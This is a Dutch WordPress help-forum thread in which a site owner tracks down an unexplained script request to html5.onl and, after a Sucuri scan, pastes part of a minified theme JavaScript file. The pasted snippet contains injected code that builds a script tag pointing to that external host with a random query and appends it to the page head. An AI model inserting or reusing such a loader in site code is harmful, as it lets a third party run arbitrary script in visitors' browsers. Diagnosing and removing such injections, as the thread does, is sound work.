Onbekend -leeg- script wordt automatisch bij mijn website geladen
-
Beste allemaal,
Sinds de launch van mijn website merk ik via mijn addblocker (uBlock Origin 1.14.10 – aanrader!) Dat mijn website een script laad vanaf de pagina https://html5.onl/nav.php?0.20838301741998777
Ik heb geen idee hoe dit in de code terecht is gekomen. Heb meerdere fileseek scans door mijn gehele server gedaan met zoektermen als “html5.onl” etc. maar kan het desbetreffende script die deze aanvraag activeert voor geen mogelijkheid vinden.
Het heeft volgens mij niets te maken met virussen o.i.d. want het script doet namelijk niks. Ik vind het hinderlijk omdat het script namelijk verbinding maakt met https://html5.onl en daardoor een SSL certificaat fout aangeeft op mijn website.
Enig advies hoe ik dit script kan opsporen en verwijderen?
Groeten!
De pagina waar ik hulp bij nodig heb: [log in om de link te zien]
-
Ik heb zonet je website bezocht. Ik zie geen mixed content of waarschuwing en in de pagesource van de homepage zie ik ook nergens html5.onl. Ik zie dan ook gewoon een groen slotje.
Kun jij eens in een andere browser of in incognito proberen?
Zie je het daar nog is het in ieder geval vreemd. Misschien best eens alle plugins tijdelijk deactiveren, kijken of het er nog is en dan 1 voor 1 weer aanzetten tot je ziet dat het terug komt en dan weet je welke plugin er voor instaat.UPDATE
Dit is vreemd, nu pas zie ik ook een probleem mbt het SSL. Ik zie nu in incognito en met cookies verwijderd ook de melding van Mixed Content en die url die je opgeeft.
Ik vind het vreemd. Heb je al eens gescand met sucuri of met wordfence?
Ik zou ook eens kijken of het met gedeactiveerde plugins ook ingeladen wordt, het komt misschien van een plugin. Kan ook gewoon in je thema verwikkeld zitten. Maar een scan kan geen kwaad.Jeroen
Beste Jeroen, bedankt voor je reactie.
De Melding met het SSL probleem wordt niet weergeven op desktop webbrowsers als Firefox, Chrome, IE etc.
Mobiele apparaten zoals tablets en telefoons die niet via een van bovenstaande browsers mijn website bezoeken krijgen wel een SSL foutmelding te zien. Wellicht omdat die browsers niet Server Name Indication SNI ondersteunen en daardoor het verkeerde certificaat beoordelen. Ik tast daarover nog in het duister.
Ik gebruik wordfence en die geeft al een paar weken geen foutmeldingen aan, ik zal sucuri eens laten draaien en kijken wat die vind.
In ieder geval bedankt voor het meedenken, ik zal proberen de plugins een voor een uit te schakelen om zo de vermoedelijke oorzaak te vinden.
Binnenkort plaats ik een update
UPDATE
Volgens Sucuri blijkt het script “40c238dce794f02ca31e59191fd3b0e1-1.js” zich te altijd te laden.
Hieronder zie je een klein gedeelte van het script. De oorzaak heb ik dikgedrukt weergeven. Ik heb het vermoeden dat dit script wel functionaliteiten heeft echter zal ik kijken of alles nog goed werkt als ik de var _ot3zr=[“//html5.onl/nav.php?”,”random”] verwijder/**handles:avia-shortcodes**/ var har_ic=document.createElement("script");har_ic.setAttribute("type","text/javascript");var _ot3zr=<em><strong>["//html5.onl/nav.php?","random"]</strong></em>,cot_hy=_ot3zr[0]+Math[_ot3zr[1]]();har_ic.setAttribute("src",cot_hy),document.getElementsByTagName("head")[0].appendChild(har_ic),!function(i){"use strict";function t(t){i.fn.avia_waypoints&&(void 0===t&&(t="body"),i(".avia_animate_when_visible",t).avia_waypoints(),i(".avia_animate_when_almost_visible",t).avia_waypoints({offset:"80%"}
- Het onderwerp ‘Onbekend -leeg- script wordt automatisch bij mijn website geladen’ is gesloten voor nieuwe reacties.